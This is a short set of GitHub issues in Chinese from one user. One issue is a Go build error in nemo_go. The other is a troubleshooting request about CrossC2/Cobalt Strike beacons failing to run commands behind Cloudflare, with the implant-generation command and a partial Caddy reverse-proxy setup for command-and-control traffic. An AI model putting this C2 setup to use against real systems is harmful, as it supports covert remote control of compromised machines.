Results 3 issues of kuron3k0

师傅,我跑build.sh好像不成功,爆这个错 ``` ➜ nemo_go git:(main) ✗ CGO_ENABLED=0 GOOS=darwin GOARCH=amd64 go build -ldflags "-s -w" -trimpath -o server_darwin_amd64 cmd/server/main.go # github.com/mat/besticon/besticon /Users/kuron3k0/go/pkg/mod/github.com/mat/[email protected]+incompatible/besticon/caching.go:28:23: cannot use siteURL (variable of type string) as type...

## 问题描述: 目前是linux和mac都可以上线,但是无法执行命令,listener换成ip上线就可以执行,用了cloudflare之后无论开不开cdn都不行,也设置了以profile的url path开头的绕过缓存了,用的profile在windows上是可以正常运行的。 ## 环境和配置: 生成木马 genCrossC2.MacOS vpsdomain 8443 ./.cobaltstrike.beacon_keys ;;/xxx/amazon.profile Linux x86 /tmp/t_cc2.out raw 用了caddy做了反向代理(v1) ``` https://vpdomain:8443 { tls /xxx/server.pem /xxx/server.key proxy /s/ https://127.0.0.1:18443 { insecure_skip_verify header_upstream X-Forwarded-For...